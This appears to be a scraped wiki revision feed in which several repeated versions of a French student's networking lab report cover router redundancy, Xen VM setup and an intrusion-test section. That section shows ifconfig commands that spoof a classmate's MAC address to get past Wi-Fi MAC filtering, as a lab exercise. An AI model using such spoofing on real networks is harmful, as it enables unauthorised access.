l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.<br /> En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. <br /> <br /> RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. <br /> <br /> SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1<br /> <br /> <pre><br /> Avec une simple ligne de code : je change mon adresse MAC !<br /> - ifconfig wlan0 down<br /> - ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br /> - ifconfig wlan0 up<br /> </pre><br /> <br /> MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.<br /> <br /> <br /> <h3>Cassage de clef WEP d'un point d'accès Wifi</h3><br /> <br /> <h3>Cassage de mot de passe WPA-PSK par force brute</h3><br /> <br /> '''''<h2>Installation des systèmes d'exploitation</h2>'''''<br /> ----<br /> <br /> J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net<br /> <br /> <pre><br /> Code :<br /> xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen<br /> <br /> nano /etc/ssh/sshd_config allow root login (without password)->yes<br /> apt -get purge network-manager systemd<br /> init tab ==> 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0<br /> </pre><br /> <br /> <pre><br /> Hostname : Werewolf<br /> Distribution : jessie<br /> MAC Address : 00:16:3E:25:96:A7<br /> IP Address(es) : 193.48.57.18<br /> RSA Fingerprint : 4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e<br /> Root Password : Il ne serait plus secret sinon ;)<br /> </pre><br /> <br /> A RETENIR :<br /> <pre><br /> Pour ouvrir la machine : xl console Werewolf<br /> Pour la fermer : halt<br /> Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg<br /> </pre><br /> <br /> '''''<h2>Services Internet</h2>'''''<br /> ----<br /> <br /> Le nom de domaine que j'ai réservé est : hunt3r.lol<br /> <br /> '''''<h2>Réalisation</h2>'''''<br /> ----<br /> <br /> <h3> Installation de LINUX sur les nouveaux PC HP </h3><br /> J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]<br /> <br /> Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : <br /> <br /> <pre><br /> Code :<br /> root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb<br /> </pre><br /> <br /> On va donc configurer le réseau nous-même.</div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=22929 TP sysres IMA2a5 2015/2016 G6 2015-11-13T14:00:20Z

<p>Ebourre : </p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> ----<br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> '''''<h2> Architecture réseau </h2>'''''<br /> ----<br /> <br /> Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.<br /> <br /> La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.<br /> <center><br /> <table><br /> <tr><th>'''N° du VLAN'''</th><th>'''Nom'''</th><th>'''Adresse IP'''</th><th>'''Adresse Routeur 1'''</th><th>'''Adresse Passerelle'''</th></tr><br /> <tr><th>2</th><th>Puduc</th><th>172.20.100.0/24</th><th>172.20.100.252</th><th>172.20.100.254</th></tr><br /> <tr><th>3</th><th>Nounours</th><th>172.20.101.0/24</th><th>172.20.101.252</th><th>172.20.101.254</th></tr><br /> <tr><th>4</th><th>Jeuno</th><th>172.20.102.0/24</th><th>172.20.102.252</th><th>172.20.102.254</th></tr><br /> <tr><th>5</th><th>Relax</th><th>172.20.103.0/24</th><th>172.20.103.252</th><th>172.20.103.254</th></tr><br /> <tr><th>6</th><th>John</th><th>172.20.104.0/24</th><th>172.20.104.252</th><th>172.20.104.254</th></tr><br /> <tr><th>7</th><th>Loki</th><th>172.20.105.0/24</th><th>172.20.105.252</th><th>172.20.105.254</th></tr><br /> <tr><th>8</th><th>Papy</th><th>172.20.106.0/24</th><th>172.20.106.252</th><th>172.20.106.254</th></tr><br /> <tr><th>10</th><th>Hub</th><th>193.48.57.176/28</th><th>193.48.57.188</th><th>193.48.57.190</th></tr><br /> <tr><th>131</th><th>Interco</th><th>192.168.222.8/29</th><th>192.168.222.9</th><th>X</th></tr><br /> </table><br /> </center><br /> <br /> Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera "prise" par le routeur le plus prioritaire. <br /> <br /> <pre><br /> Code sous minicom pour réaliser l'adressage des VLan's: <br /> <br /> - en // passage en mode administrateur<br /> - conf t <br /> - int vlan2 //modification du vlan2<br /> - ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2<br /> - standby 1 ip 172.20.100.254 // adresse de passerelle<br /> - standby 1 preempt //Utilisation du protocole HSRP nécessaire à la redondance<br /> - standby 1 priority 110 // priorité pour la prise de l'adresse passerelle<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un nom à un VLAN: <br /> <br /> - conf t <br /> - vlan8<br /> - name Papy<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un port (içi pour internet)<br /> <br /> - conf t <br /> - interface GigabitEthernet 0/47 // on agit sur ce port<br /> - Sitchport mode access<br /> - switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet<br /> - no shut<br /> </pre><br /> <br /> <pre><br /> Code pour l'échange automatique des tables de routages :<br /> <br /> - Switch(config)#router ospf 1<br /> -Switch(config-router)#log-adjacency-changes<br /> -Switch(config-router)#router-id 172.20.100.252<br /> -Switch(config-router)#log-adjacency-changes <br /> -Switch(config-router)#summary-address 172.20.96.0 255.255.240.0<br /> -Switch(config-router)#summary-address 193.48.57.176 255.255.255.240<br /> -Switch(config-router)#redistribute connected metric 20 subnets <br /> -Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2<br /> </pre><br /> <br /> Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.<br /> <br /> <br /> '''''<h2> Tests d'intrusion </h2>'''''<br /> ----<br /> <br /> <h3>Intrusion par changement d'adresse MAC</h3><br /> <br /> Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.<br /> En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. <br /> <br /> RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. <br /> <br /> SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1<br /> <br /> <pre><br /> Avec une simple ligne de code : je change mon adresse MAC !<br /> - ifconfig wlan0 down<br /> - ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br /> - ifconfig wlan0 up<br /> </pre><br /> <br /> MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.<br /> <br /> <br /> <h3>Cassage de clef WEP d'un point d'accès Wifi</h3><br /> <br /> <h3>Cassage de mot de passe WPA-PSK par force brute</h3><br /> <br /> '''''<h2>Installation des systèmes d'exploitation</h2>'''''<br /> ----<br /> <br /> J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net<br /> <br /> <pre><br /> Code :<br /> xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen<br /> <br /> nano /etc/ssh/sshd_config allow root login (without password)->yes<br /> apt -get purge network-manager systemd<br /> init tab ==> 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0<br /> </pre><br /> <br /> <pre><br /> Hostname : Werewolf<br /> Distribution : jessie<br /> MAC Address : 00:16:3E:25:96:A7<br /> IP Address(es) : 193.48.57.18<br /> RSA Fingerprint : 4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e<br /> Root Password : Il ne serait plus secret sinon ;)<br /> </pre><br /> <br /> A RETENIR :<br /> <pre><br /> Pour ouvrir la machine : xl console Werewolf<br /> Pour la fermer : halt<br /> Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg<br /> </pre><br /> <br /> '''''<h2>Services Internet</h2>'''''<br /> ----<br /> <br /> Le nom de domaine que j'ai réservé est : hunt3r.lol<br /> <br /> '''''<h2>Réalisation</h2>'''''<br /> ----<br /> <br /> <h3> Installation de LINUX sur les nouveaux PC HP </h3><br /> J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]<br /> <br /> Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : <br /> <br /> <pre><br /> Code :<br /> root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb<br /> </pre></div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=22928 TP sysres IMA2a5 2015/2016 G6 2015-11-13T13:46:45Z

<p>Ebourre : </p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> ----<br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> '''''<h2> Architecture réseau </h2>'''''<br /> ----<br /> <br /> Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.<br /> <br /> La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.<br /> <center><br /> <table><br /> <tr><th>'''N° du VLAN'''</th><th>'''Nom'''</th><th>'''Adresse IP'''</th><th>'''Adresse Routeur 1'''</th><th>'''Adresse Passerelle'''</th></tr><br /> <tr><th>2</th><th>Puduc</th><th>172.20.100.0/24</th><th>172.20.100.252</th><th>172.20.100.254</th></tr><br /> <tr><th>3</th><th>Nounours</th><th>172.20.101.0/24</th><th>172.20.101.252</th><th>172.20.101.254</th></tr><br /> <tr><th>4</th><th>Jeuno</th><th>172.20.102.0/24</th><th>172.20.102.252</th><th>172.20.102.254</th></tr><br /> <tr><th>5</th><th>Relax</th><th>172.20.103.0/24</th><th>172.20.103.252</th><th>172.20.103.254</th></tr><br /> <tr><th>6</th><th>John</th><th>172.20.104.0/24</th><th>172.20.104.252</th><th>172.20.104.254</th></tr><br /> <tr><th>7</th><th>Loki</th><th>172.20.105.0/24</th><th>172.20.105.252</th><th>172.20.105.254</th></tr><br /> <tr><th>8</th><th>Papy</th><th>172.20.106.0/24</th><th>172.20.106.252</th><th>172.20.106.254</th></tr><br /> <tr><th>10</th><th>Hub</th><th>193.48.57.176/28</th><th>193.48.57.188</th><th>193.48.57.190</th></tr><br /> <tr><th>131</th><th>Interco</th><th>192.168.222.8/29</th><th>192.168.222.9</th><th>X</th></tr><br /> </table><br /> </center><br /> <br /> Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera "prise" par le routeur le plus prioritaire. <br /> <br /> <pre><br /> Code sous minicom pour réaliser l'adressage des VLan's: <br /> <br /> - en // passage en mode administrateur<br /> - conf t <br /> - int vlan2 //modification du vlan2<br /> - ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2<br /> - standby 1 ip 172.20.100.254 // adresse de passerelle<br /> - standby 1 preempt //Utilisation du protocole HSRP nécessaire à la redondance<br /> - standby 1 priority 110 // priorité pour la prise de l'adresse passerelle<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un nom à un VLAN: <br /> <br /> - conf t <br /> - vlan8<br /> - name Papy<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un port (içi pour internet)<br /> <br /> - conf t <br /> - interface GigabitEthernet 0/47 // on agit sur ce port<br /> - Sitchport mode access<br /> - switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet<br /> - no shut<br /> </pre><br /> <br /> <pre><br /> Code pour l'échange automatique des tables de routages :<br /> <br /> - Switch(config)#router ospf 1<br /> -Switch(config-router)#log-adjacency-changes<br /> -Switch(config-router)#router-id 172.20.100.252<br /> -Switch(config-router)#log-adjacency-changes <br /> -Switch(config-router)#summary-address 172.20.96.0 255.255.240.0<br /> -Switch(config-router)#summary-address 193.48.57.176 255.255.255.240<br /> -Switch(config-router)#redistribute connected metric 20 subnets <br /> -Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2<br /> </pre><br /> <br /> Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.<br /> <br /> <br /> '''''<h2> Tests d'intrusion </h2>'''''<br /> ----<br /> <br /> <h3>Intrusion par changement d'adresse MAC</h3><br /> <br /> Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.<br /> En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. <br /> <br /> RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. <br /> <br /> SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1<br /> <br /> <pre><br /> Avec une simple ligne de code : je change mon adresse MAC !<br /> - ifconfig wlan0 down<br /> - ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br /> - ifconfig wlan0 up<br /> </pre><br /> <br /> MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.<br /> <br /> <br /> <h3>Cassage de clef WEP d'un point d'accès Wifi</h3><br /> <br /> <h3>Cassage de mot de passe WPA-PSK par force brute</h3><br /> <br /> '''''<h2>Installation des systèmes d'exploitation</h2>'''''<br /> ----<br /> <br /> J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net<br /> <br /> <pre><br /> Code :<br /> xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen<br /> <br /> nano /etc/ssh/sshd_config allow root login (without password)->yes<br /> apt -get purge network-manager systemd<br /> init tab ==> 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0<br /> </pre><br /> <br /> <pre><br /> Hostname : Werewolf<br /> Distribution : jessie<br /> MAC Address : 00:16:3E:25:96:A7<br /> IP Address(es) : 193.48.57.18<br /> RSA Fingerprint : 4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e<br /> Root Password : Il ne serait plus secret sinon ;)<br /> </pre><br /> <br /> A RETENIR :<br /> <pre><br /> Pour ouvrir la machine : xl console Werewolf<br /> Pour la fermer : halt<br /> Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg<br /> </pre><br /> <br /> '''''<h2>Services Internet</h2>'''''<br /> ----<br /> <br /> Le nom de domaine que j'ai réservé est : hunt3r.lol<br /> <br /> '''''<h2>Réalisation</h2>'''''<br /> ----<br /> <br /> <h3> Installation de LINUX sur les nouveaux PC HP </h3><br /> J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]<br /> <br /> Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé.</div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=22773 TP sysres IMA2a5 2015/2016 G6 2015-11-06T10:07:35Z

<p>Ebourre : </p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> ----<br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> '''''<h2> Architecture réseau </h2>'''''<br /> ----<br /> <br /> Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.<br /> <br /> La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.<br /> <center><br /> <table><br /> <tr><th>'''N° du VLAN'''</th><th>'''Nom'''</th><th>'''Adresse IP'''</th><th>'''Adresse Routeur 1'''</th><th>'''Adresse Passerelle'''</th></tr><br /> <tr><th>2</th><th>Puduc</th><th>172.20.100.0/24</th><th>172.20.100.252</th><th>172.20.100.254</th></tr><br /> <tr><th>3</th><th>Nounours</th><th>172.20.101.0/24</th><th>172.20.101.252</th><th>172.20.101.254</th></tr><br /> <tr><th>4</th><th>Jeuno</th><th>172.20.102.0/24</th><th>172.20.102.252</th><th>172.20.102.254</th></tr><br /> <tr><th>5</th><th>Relax</th><th>172.20.103.0/24</th><th>172.20.103.252</th><th>172.20.103.254</th></tr><br /> <tr><th>6</th><th>John</th><th>172.20.104.0/24</th><th>172.20.104.252</th><th>172.20.104.254</th></tr><br /> <tr><th>7</th><th>Loki</th><th>172.20.105.0/24</th><th>172.20.105.252</th><th>172.20.105.254</th></tr><br /> <tr><th>8</th><th>Papy</th><th>172.20.106.0/24</th><th>172.20.106.252</th><th>172.20.106.254</th></tr><br /> <tr><th>10</th><th>Hub</th><th>193.48.57.176/28</th><th>193.48.57.188</th><th>193.48.57.190</th></tr><br /> <tr><th>131</th><th>Interco</th><th>192.168.222.8/29</th><th>192.168.222.9</th><th>X</th></tr><br /> </table><br /> </center><br /> <br /> Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera "prise" par le routeur le plus prioritaire. <br /> <br /> <pre><br /> Code sous minicom pour réaliser l'adressage des VLan's: <br /> <br /> - en // passage en mode administrateur<br /> - conf t <br /> - int vlan2 //modification du vlan2<br /> - ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2<br /> - standby 1 ip 172.20.100.254 // adresse de passerelle<br /> - standby 1 preempt //Utilisation du protocole HSRP nécessaire à la redondance<br /> - standby 1 priority 110 // priorité pour la prise de l'adresse passerelle<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un nom à un VLAN: <br /> <br /> - conf t <br /> - vlan8<br /> - name Papy<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un port (içi pour internet)<br /> <br /> - conf t <br /> - interface GigabitEthernet 0/47 // on agit sur ce port<br /> - Sitchport mode access<br /> - switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet<br /> - no shut<br /> </pre><br /> <br /> <pre><br /> Code pour l'échange automatique des tables de routages :<br /> <br /> - Switch(config)#router ospf 1<br /> -Switch(config-router)#log-adjacency-changes<br /> -Switch(config-router)#router-id 172.20.100.252<br /> -Switch(config-router)#log-adjacency-changes <br /> -Switch(config-router)#summary-address 172.20.96.0 255.255.240.0<br /> -Switch(config-router)#summary-address 193.48.57.176 255.255.255.240<br /> -Switch(config-router)#redistribute connected metric 20 subnets <br /> -Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2<br /> </pre><br /> <br /> Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.<br /> <br /> <br /> '''''<h2> Tests d'intrusion </h2>'''''<br /> ----<br /> <br /> <h3>Intrusion par changement d'adresse MAC</h3><br /> <br /> Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.<br /> En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. <br /> <br /> RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. <br /> <br /> SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1<br /> <br /> <pre><br /> Avec une simple ligne de code : je change mon adresse MAC !<br /> - ifconfig wlan0 down<br /> - ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br /> - ifconfig wlan0 up<br /> </pre><br /> <br /> MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.<br /> <br /> <br /> <h3>Cassage de clef WEP d'un point d'accès Wifi</h3><br /> <br /> <h3>Cassage de mot de passe WPA-PSK par force brute</h3><br /> <br /> '''''<h2>Installation des systèmes d'exploitation</h2>'''''<br /> ----<br /> <br /> J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net<br /> <br /> <pre><br /> Code :<br /> xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen<br /> <br /> nano /etc/ssh/sshd_config allow root login (without password)->yes<br /> apt -get purge network-manager systemd<br /> init tab ==> 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0<br /> </pre><br /> <br /> <pre><br /> Hostname : Werewolf<br /> Distribution : jessie<br /> MAC Address : 00:16:3E:25:96:A7<br /> IP Address(es) : 193.48.57.18<br /> RSA Fingerprint : 4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e<br /> Root Password : Il ne serait plus secret sinon ;)<br /> </pre><br /> <br /> A RETENIR :<br /> <pre><br /> Pour ouvrir la machine : xl console Werewolf<br /> Pour la fermer : halt<br /> Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg<br /> </pre><br /> <br /> '''''<h2>Services Internet</h2>'''''<br /> ----<br /> <br /> Le nom de domaine que j'ai réservé est : hunt3r.lol<br /> <br /> '''''<h2>Réalisation</h2>'''''<br /> ----</div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=22768 TP sysres IMA2a5 2015/2016 G6 2015-11-06T09:43:58Z

<p>Ebourre : </p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> ----<br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> '''''<h2> Architecture réseau </h2>'''''<br /> ----<br /> <br /> Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.<br /> <br /> La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.<br /> <center><br /> <table><br /> <tr><th>'''N° du VLAN'''</th><th>'''Nom'''</th><th>'''Adresse IP'''</th><th>'''Adresse Routeur 1'''</th><th>'''Adresse Passerelle'''</th></tr><br /> <tr><th>2</th><th>Puduc</th><th>172.20.100.0/24</th><th>172.20.100.252</th><th>172.20.100.254</th></tr><br /> <tr><th>3</th><th>Nounours</th><th>172.20.101.0/24</th><th>172.20.101.252</th><th>172.20.101.254</th></tr><br /> <tr><th>4</th><th>Jeuno</th><th>172.20.102.0/24</th><th>172.20.102.252</th><th>172.20.102.254</th></tr><br /> <tr><th>5</th><th>Relax</th><th>172.20.103.0/24</th><th>172.20.103.252</th><th>172.20.103.254</th></tr><br /> <tr><th>6</th><th>John</th><th>172.20.104.0/24</th><th>172.20.104.252</th><th>172.20.104.254</th></tr><br /> <tr><th>7</th><th>Loki</th><th>172.20.105.0/24</th><th>172.20.105.252</th><th>172.20.105.254</th></tr><br /> <tr><th>8</th><th>Papy</th><th>172.20.106.0/24</th><th>172.20.106.252</th><th>172.20.106.254</th></tr><br /> <tr><th>10</th><th>Hub</th><th>193.48.57.176/28</th><th>193.48.57.188</th><th>193.48.57.190</th></tr><br /> <tr><th>131</th><th>Interco</th><th>192.168.222.8/29</th><th>192.168.222.9</th><th>X</th></tr><br /> </table><br /> </center><br /> <br /> Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera "prise" par le routeur le plus prioritaire. <br /> <br /> <pre><br /> Code sous minicom pour réaliser l'adressage des VLan's: <br /> <br /> - en // passage en mode administrateur<br /> - conf t <br /> - int vlan2 //modification du vlan2<br /> - ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2<br /> - standby 1 ip 172.20.100.254 // adresse de passerelle<br /> - standby 1 preempt //Utilisation du protocole HSRP nécessaire à la redondance<br /> - standby 1 priority 110 // priorité pour la prise de l'adresse passerelle<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un nom à un VLAN: <br /> <br /> - conf t <br /> - vlan8<br /> - name Papy<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un port (içi pour internet)<br /> <br /> - conf t <br /> - interface GigabitEthernet 0/47 // on agit sur ce port<br /> - Sitchport mode access<br /> - switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet<br /> - no shut<br /> </pre><br /> <br /> <pre><br /> Code pour l'échange automatique des tables de routages :<br /> <br /> - Switch(config)#router ospf 1<br /> -Switch(config-router)#log-adjacency-changes<br /> -Switch(config-router)#router-id 172.20.100.252<br /> -Switch(config-router)#log-adjacency-changes <br /> -Switch(config-router)#summary-address 172.20.96.0 255.255.240.0<br /> -Switch(config-router)#summary-address 193.48.57.176 255.255.255.240<br /> -Switch(config-router)#redistribute connected metric 20 subnets <br /> -Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2<br /> </pre><br /> <br /> Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.<br /> <br /> <br /> '''''<h2> Tests d'intrusion </h2>'''''<br /> ----<br /> <br /> <h3>Intrusion par changement d'adresse MAC</h3><br /> <br /> Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.<br /> En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. <br /> <br /> RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. <br /> <br /> SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai 